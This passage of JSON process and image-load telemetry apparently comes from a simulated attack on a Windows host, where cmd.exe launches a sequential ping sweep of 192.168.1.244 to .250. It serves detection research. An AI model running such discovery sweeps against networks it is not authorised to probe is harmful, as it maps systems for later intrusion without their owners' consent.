"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "process", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573186990000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.244", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5296, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573187130000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": 
"{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187300000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187300000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "process", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573191830000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.245", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5560, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "process", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573196990000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.246", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3320, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197300000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197300000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197300000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "process", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573201990000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.247", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8156, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8156, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "process", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573206830000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.248", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5364, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "process", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573211830000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.249", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7624, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "process", - 
"pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573212290000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.250", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2244, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573212510000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104C005401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573212450016, - 
